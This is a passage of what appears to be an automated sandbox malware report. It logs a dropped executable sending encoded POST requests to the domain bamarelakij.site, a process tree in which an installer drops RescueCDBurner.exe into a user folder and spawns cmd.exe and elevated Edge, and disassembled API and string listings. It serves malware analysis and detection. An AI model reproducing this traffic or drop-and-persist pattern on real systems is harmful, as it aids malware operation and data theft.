2025-01-09 13:42:58 UTC	15331	OUT	Data Raw: 5c 57 02 dc 57 62 72 c4 90 d3 42 ec 93 8f 87 10 4f 2e 7e 52 41 7d 43 90 50 08 60 94 f8 a9 56 9c c9 f3 aa 02 1a 84 79 53 8d 86 90 92 d3 22 0f c7 94 05 82 a1 1e dd 80 14 90 33 cf 1e 02 14 1a 86 84 75 03 66 90 b0 5f 4f 7c 16 2c 16 f8 74 8b e6 4d 93 c1 29 9e f8 d8 0c e8 9e d4 f2 92 f1 94 40 45 4a 10 43 8b 77 36 e0 ed 27 2f 64 b0 c8 24 ab a5 50 91 61 2e c2 19 58 64 80 b0 b9 7b 45 32 c2 ba 76 bd 93 ab 6e 59 41 55 5d 1a e5 e5 41 82 8a 08 a9 a8 65 0c cc ec b3 22 c5 72 ab 47 25 62 61 a9 cb b3 e7 ad 8d 55 c5 7b f5 db 52 dc eb b1 8c c1 76 c7 be 96 f1 7d af 88 26 f3 24 22 62 9e 3c d7 c7 01 20 23 16 ec 51 98 e2 21 52 7b d7 5d 57 09 6f 27 93 b3 15 6b ce 9d 7b d9 7d 60 23 fb a6 6e e3 86 b5 59 4b 8e ae b3 69 45 de 0f 93 cb cd 79 22 ad 3a 79 ad 8c d4 7f e1 aa 84 1b 55 38 Data Ascii: \WWbrBO.~RA}CP`VyS"3uf_O\|,tM)@EJCw6'/d$Pa.Xd{E2vnYAU]Ae"rG%baU{Rv}&$"b< #Q!R{]Wo'k{}`#nYKiEy":yU8
2025-01-09 13:42:58 UTC	9294	OUT	Data Raw: a8 56 d8 c1 e4 d2 f0 ca ce 77 44 cc b7 c8 ca 43 39 02 59 b8 70 f4 b5 e8 b9 a9 b4 d3 f7 8a b8 63 9b 57 4e 35 5f 3b 7a 7b 0d 06 1a ad 08 d9 ad e2 f3 19 01 d7 68 48 86 21 67 ac ec ca 9b 5d 8c d9 89 38 cf 38 f9 40 af 14 6e 4a 28 52 bd 46 a3 f4 ec b2 c8 fb 12 b8 a2 eb 9b 63 82 33 33 d8 d5 fd fe b1 fe 07 5d 6c de fa 11 36 4f 08 fc 9a 0f ec 41 ae 11 dd aa 85 14 f7 47 b7 e8 7a 5c 45 5a 97 a5 6f 66 9d b4 4f 21 a5 43 cd 2e ce 8a a1 4a a0 8f c3 af bf 37 1f 2b 13 3e 53 5b 3b 2b fb f8 7a 1d 62 5a 2d 7c 83 06 d1 49 3c db e3 a0 37 71 bb 8b e2 75 ec b2 76 46 54 bd 32 85 3b c4 26 6b 3c 5a eb 77 66 ca c2 df 26 5f a7 7a 74 ee 16 f4 5b df 3f 12 29 51 5c 33 bf cd 8f f4 a6 25 e9 ea 17 74 d5 13 a6 4d 68 76 45 ac c1 ae b4 32 b2 a4 ee 38 3b 91 61 31 db 67 0d 99 09 f6 8e 7a f4 e1 Data Ascii: VwDC9YpcWN5_;z{hH!g]88@nJ(RFc33]l6OAGz\EZofO!C.J7+>S[;+zbZ-\|I<7quvFT2;&k<Zwf&_zt[?)Q\3%tMhvE28;a1gz
2025-01-09 13:42:59 UTC	808	IN	HTTP/1.1 204 No Content Date: Thu, 09 Jan 2025 13:42:59 GMT Connection: close v: I/+hipjptZ22kvA+Vo5y5gFoiU/5m5OWTHWfDBjxMvd7mJ5R0ngG+FXDXr5HaMwQW/XKec/37A cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vSoqNPY8ISKobuUuRgjhLA1gO46vus5F1D3ci%2BaLxfpU1CciSgUbCl26MYcRERVo%2B6AvZftBxAI5Ndt44PuV821NVluY1RzJk1umRuFqJqgKboCU2UacpX3MeFAsDX%2FN5N9i"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff4da87b891de93-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1772&min_rtt=1763&rtt_var=680&sent=30&recv=78&lost=0&retrans=0&sent_bytes=2838&recv_bytes=71890&delivery_rate=1587819&cwnd=248&unsent_bytes=0&cid=3c030f1eebf24729&ts=599&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.8	49821	172.67.174.91	443	1308	C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 13:42:59 UTC	435	OUT	POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15 fileid: I/+hipjptZ22kvA+Vo5y5gFoiU/5m5OWTHWfDBjxMvd7mJ5R0ngG+FXDXr5HaMwQW/XKec/37A Content-Length: 35 Host: bamarelakij.site
2025-01-09 13:42:59 UTC	35	OUT	Data Raw: 03 00 00 00 00 00 00 00 00 00 00 00 fd ff ff ff 92 00 02 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii:
2025-01-09 13:42:59 UTC	736	IN	HTTP/1.1 204 No Content Date: Thu, 09 Jan 2025 13:42:59 GMT Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=maV9LPaoLuUhC%2Fh13t3peZGqr%2FthQQOiVYh4Ps6n3Id4kSXYdz%2B%2FbhqryTtQGREsR%2BrEfxJaQRq4YdsTd2Z1XsHoqJ%2FW0%2BPaDcEJ0P2AY9kwnSbEOlIX%2BdYMD93VbdV2nHME"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff4da8d5e140c74-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1705&min_rtt=1685&rtt_var=672&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1106&delivery_rate=1581798&cwnd=101&unsent_bytes=0&cid=c58e834504b466d1&ts=304&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.8	49822	172.67.174.91	443	1280	C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 13:42:59 UTC	435	OUT	POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15 fileid: I/+hipjptZ22kvA+Vo5y5gFoiU/5m5OWTHWfDBjxMvd7mJ5R0ngG+FXDXr5HaMwQW/XKec/37A Content-Length: 35 Host: bamarelakij.site
2025-01-09 13:42:59 UTC	35	OUT	Data Raw: 03 00 00 00 00 00 00 00 00 00 00 00 fd ff ff ff 92 00 02 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii:
2025-01-09 13:42:59 UTC	728	IN	HTTP/1.1 204 No Content Date: Thu, 09 Jan 2025 13:42:59 GMT Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VZF06VgO3K0KICrruiss8DglW1k%2FWfdFYyjkcbZcMq%2FPnhlNvIC6ys9jEEiArp3on3CS%2Fde8c2Ko6xYxcwNdPJ6PmH9DMW0jeMzFgIYYYPzZ4yUGqfa%2B3DdizyV0wr4zvx4k"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff4da8fcf265e6b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1595&min_rtt=1587&rtt_var=612&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1106&delivery_rate=1764350&cwnd=247&unsent_bytes=0&cid=22537cb0b595ce50&ts=230&x=0"

Target ID:	1
Start time:	08:41:31
Start date:	09/01/2025
Path:	C:\Users\user\Desktop\24EPV9vjc5.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\24EPV9vjc5.exe"
Imagebase:	0x990000
File size:	15'692'672 bytes
MD5 hash:	EC4072E1AE2A9316270E6AFD66235A97
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	08:41:32
Start date:	09/01/2025
Path:	C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe" -burn.clean.room="C:\Users\user\Desktop\24EPV9vjc5.exe" -burn.filehandle.attached=532 -burn.filehandle.self=520
Imagebase:	0xb70000
File size:	15'692'672 bytes
MD5 hash:	EC4072E1AE2A9316270E6AFD66235A97
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 47%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	08:41:34
Start date:	09/01/2025
Path:	C:\Windows\Temp\{FAAFCC35-C685-416F-8D19-DF695975ACC5}\.ba\RescueCDBurner.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Temp\{FAAFCC35-C685-416F-8D19-DF695975ACC5}\.ba\RescueCDBurner.exe
Imagebase:	0x460000
File size:	6'487'736 bytes
MD5 hash:	11C8962675B6D535C018A63BE0821E4C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 3%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	08:41:36
Start date:	09/01/2025
Path:	C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe
Imagebase:	0xb20000
File size:	6'487'736 bytes
MD5 hash:	11C8962675B6D535C018A63BE0821E4C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 3%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	08:41:37
Start date:	09/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\cmd.exe
Imagebase:	0xa40000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	08:41:37
Start date:	09/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	08:42:01
Start date:	09/01/2025
Path:	C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Imagebase:	0x140000000
File size:	2'364'728 bytes
MD5 hash:	967F4470627F823F4D7981E511C9824F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	08:42:14
Start date:	09/01/2025
Path:	C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe"
Imagebase:	0xb20000
File size:	6'487'736 bytes
MD5 hash:	11C8962675B6D535C018A63BE0821E4C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	08:42:15
Start date:	09/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\cmd.exe
Imagebase:	0xa40000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	08:42:15
Start date:	09/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	08:42:25
Start date:	09/01/2025
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory="Default"
Imagebase:	0x7ff7f97c0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	08:42:25
Start date:	09/01/2025
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Imagebase:	0x7ff7f97c0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	16
Start time:	08:42:26
Start date:	09/01/2025
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2188 --field-trial-handle=2028,i,14218575738694767663,17851418159564160666,262144 /prefetch:3
Imagebase:	0x7ff7f97c0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	08:42:27
Start date:	09/01/2025
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2228 --field-trial-handle=2004,i,2358623161053230847,14197786204813222314,262144 /prefetch:3
Imagebase:	0x7ff7f97c0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	22
Start time:	08:42:33
Start date:	09/01/2025
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6892 --field-trial-handle=2004,i,2358623161053230847,14197786204813222314,262144 /prefetch:8
Imagebase:	0x7ff7f97c0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	08:42:33
Start date:	09/01/2025
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=7060 --field-trial-handle=2004,i,2358623161053230847,14197786204813222314,262144 /prefetch:8
Imagebase:	0x7ff7f97c0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	08:42:35
Start date:	09/01/2025
Path:	C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Imagebase:	0x140000000
File size:	2'364'728 bytes
MD5 hash:	967F4470627F823F4D7981E511C9824F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	08:43:27
Start date:	09/01/2025
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=7036 --field-trial-handle=2004,i,2358623161053230847,14197786204813222314,262144 /prefetch:8
Imagebase:	0x7ff7f97c0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Function 00993CC4 Relevance: 47.6, APIs: 23, Strings: 4, Instructions: 320
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesW.KERNELBASE(?,?,?,?,00000001,00000000,?), ref: 00993D40
GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 00993D53
SetFileAttributesW.KERNEL32(?,00000080,?,?,?,00000001,00000000,?), ref: 00993D9E
GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 00993DA8
GetTempPathW.KERNEL32(00000104,?,?,?,?,00000001,00000000,?), ref: 00993DF6
GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 00993E00
FindFirstFileW.KERNELBASE(?,?,?,*.*,?,?,?,?,00000001,00000000,?), ref: 00993E53
GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 00993E64
SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,00000001,00000000,?), ref: 00993F3E
DeleteFileW.KERNELBASE(?,?,?,?,?,?,?,00000001,00000000,?), ref: 00993F52
GetTempFileNameW.KERNEL32(?,DEL,00000000,?,?,?,?,00000001,00000000,?), ref: 00993F79
MoveFileExW.KERNEL32(?,?,00000001,?,?,?,00000001,00000000,?), ref: 00993F9C
MoveFileExW.KERNEL32(?,00000000,00000004,?,?,?,00000001,00000000,?), ref: 00993FB5
FindNextFileW.KERNELBASE(000000FF,?,?,?,?,?,?,?,00000001,00000000,?), ref: 00993FC5
GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 00993FDA
GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 00994009
GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 0099402B
GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 0099404D
RemoveDirectoryW.KERNELBASE(?,?,?,?,00000001,00000000,?), ref: 00994064
GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 0099406E
MoveFileExW.KERNEL32(?,00000000,00000004,?,?,?,00000001,00000000,?), ref: 00994095
GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 009940B0
FindClose.KERNEL32(000000FF,?,?,?,00000001,00000000,?), ref: 009940E6

Strings

dirutil.cpp, xrefs: 00993D76, 00993FFA
4Wu, xrefs: 00993DF6
DEL, xrefs: 00993F6D
*.*, xrefs: 00993E2C

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorFileLast$AttributesFindMove$Temp$CloseDeleteDirectoryFirstNameNextPathRemove
String ID: 4Wu$*.*$DEL$dirutil.cpp
API String ID: 1544372074-971470659
Opcode ID: fe2ffd2fcf7029a099dd624d5fb420c6e83ea67afefd9d02ac64941965229585
Instruction ID: 8a81fe1768191b1bf2aad94a2054b7f8059388c30bb61ddb64953715d5bc2eb6
Opcode Fuzzy Hash: fe2ffd2fcf7029a099dd624d5fb420c6e83ea67afefd9d02ac64941965229585
Instruction Fuzzy Hash: C5B1F873D45239EBEF315E6D8C05F9AB67DAF40720F0142A1EE08B7190D7728E91DA90

Function 00995195 Relevance: 38.8, APIs: 5, Strings: 17, Instructions: 315
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?), ref: 00995217

Part of subcall function 009D04F8: InitializeCriticalSection.KERNEL32(009FB5FC,?,00995223,00000000,?,?,?,?,?,?), ref: 009D050F

Part of subcall function 0099120A: CommandLineToArgvW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000,ignored ,00000000,?,00000000,?,?,?,0099523F,00000000,?), ref: 00991248
Part of subcall function 0099120A: GetLastError.KERNEL32(?,?,?,0099523F,00000000,?,?,00000003,00000000,00000000,?,?,?,?,?,?), ref: 00991252

CoInitializeEx.COMBASE(00000000,00000000,?,?,00000000,?,?,00000003,00000000,00000000,?,?,?,?,?,?), ref: 00995285

Part of subcall function 009D0E07: GetProcAddress.KERNEL32(RegDeleteKeyExW,AdvApi32.dll), ref: 009D0E28

GetVersionExW.KERNEL32(?,?,?,?,?,?,?), ref: 00995317
GetLastError.KERNEL32(?,?,?,?,?,?), ref: 00995321
CoUninitialize.COMBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0099558E

Strings

Failed to get OS info., xrefs: 0099534F
Failed to run per-user mode., xrefs: 00995494
Failed to initialize XML util., xrefs: 009952F9
Failed to run untrusted mode., xrefs: 009954B6
Failed to run embedded mode., xrefs: 00995444
Failed to initialize core., xrefs: 009953C3
3.11.1.2318, xrefs: 00995384
Failed to initialize Wiutil., xrefs: 009952E1
Failed to run per-machine mode., xrefs: 0099546C
Failed to initialize Cryputil., xrefs: 009952A6
Failed to parse command line., xrefs: 00995245
Failed to run RunOnce mode., xrefs: 0099541C
Invalid run mode., xrefs: 009953F9
engine.cpp, xrefs: 00995345
Failed to initialize engine state., xrefs: 0099526C
Failed to initialize Regutil., xrefs: 009952C9
Failed to initialize COM., xrefs: 00995291

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorInitializeLast$AddressArgvCommandCriticalHandleLineModuleProcSectionUninitializeVersion
String ID: 3.11.1.2318$Failed to get OS info.$Failed to initialize COM.$Failed to initialize Cryputil.$Failed to initialize Regutil.$Failed to initialize Wiutil.$Failed to initialize XML util.$Failed to initialize core.$Failed to initialize engine state.$Failed to parse command line.$Failed to run RunOnce mode.$Failed to run embedded mode.$Failed to run per-machine mode.$Failed to run per-user mode.$Failed to run untrusted mode.$Invalid run mode.$engine.cpp
API String ID: 3262001429-510904028
Opcode ID: fb0a91617eccd7901edc46832ed937e60843c53877cde253e2de6583f731c4dd
Instruction ID: 56db893fc790d91e1600977fb6e6dbfe9af09d34155e291762774c721203613a
Opcode Fuzzy Hash: fb0a91617eccd7901edc46832ed937e60843c53877cde253e2de6583f731c4dd
Instruction Fuzzy Hash: 1AB1CA71D816299BDF336F68CC46BEE77B8AF84710F024196F908B6251DB349E80CB91

Function 009D304F Relevance: 24.7, APIs: 8, Strings: 6, Instructions: 153libraryloadercomCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,00000000,00000000,009D3609,00000000,?,00000000), ref: 009D3069
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,009BC025,?,00995405,?,00000000,?), ref: 009D3075
GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 009D30B5
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 009D30C1
GetProcAddress.KERNEL32(00000000,Wow64EnableWow64FsRedirection), ref: 009D30CC
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 009D30D6
CoCreateInstance.OLE32(009FB6B8,00000000,00000001,009DB818,?,?,?,?,?,?,?,?,?,?,?,009BC025), ref: 009D3111
ExitProcess.KERNEL32 ref: 009D31C0

Strings

kernel32.dll, xrefs: 009D3059
Wow64RevertWow64FsRedirection, xrefs: 009D30CE
Wow64EnableWow64FsRedirection, xrefs: 009D30C3
xmlutil.cpp, xrefs: 009D3099
Wow64DisableWow64FsRedirection, xrefs: 009D30BB
IsWow64Process, xrefs: 009D30AF

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: AddressProc$CreateErrorExitHandleInstanceLastModuleProcess
String ID: IsWow64Process$Wow64DisableWow64FsRedirection$Wow64EnableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$xmlutil.cpp
API String ID: 2124981135-499589564
Opcode ID: eca096c13e7e7095632ab8f32f6f42c43a66075c177e054bfeb235aad9226e1f
Instruction ID: e414a56b7ed497a55542aa5a7268d6e4ee6162fdef1f6a55692d131fcd026086
Opcode Fuzzy Hash: eca096c13e7e7095632ab8f32f6f42c43a66075c177e054bfeb235aad9226e1f
Instruction Fuzzy Hash: E741C631A8531AABDB20DFA9C845B6EB7B8EF45712F11C16AEA01E7340D771DE40CB91

Function 00991070 Relevance: 19.3, APIs: 2, Strings: 9, Instructions: 78fileCOMMON

Download Yara Rule

APIs

Part of subcall function 009933C7: GetModuleFileNameW.KERNEL32(?,?,00000104,?,00000104,?,?,?,?,009910DD,?,00000000), ref: 009933E8

CreateFileW.KERNELBASE(?,80000000,00000005,00000000,00000003,00000080,00000000,?,00000000), ref: 009910F6

Part of subcall function 00991175: HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,0099111A,cabinet.dll,00000009,?,?,00000000), ref: 00991186
Part of subcall function 00991175: GetModuleHandleW.KERNEL32(kernel32,?,?,?,?,?,0099111A,cabinet.dll,00000009,?,?,00000000), ref: 00991191
Part of subcall function 00991175: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 0099119F
Part of subcall function 00991175: GetLastError.KERNEL32(?,?,?,?,?,0099111A,cabinet.dll,00000009,?,?,00000000), ref: 009911BA
Part of subcall function 00991175: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 009911C2
Part of subcall function 00991175: GetLastError.KERNEL32(?,?,?,?,?,0099111A,cabinet.dll,00000009,?,?,00000000), ref: 009911D7

CloseHandle.KERNELBASE(?,?,?,?,009DB4D0,?,cabinet.dll,00000009,?,?,00000000), ref: 00991131

Strings

msasn1.dll, xrefs: 009910C3
feclient.dll, xrefs: 009910D1
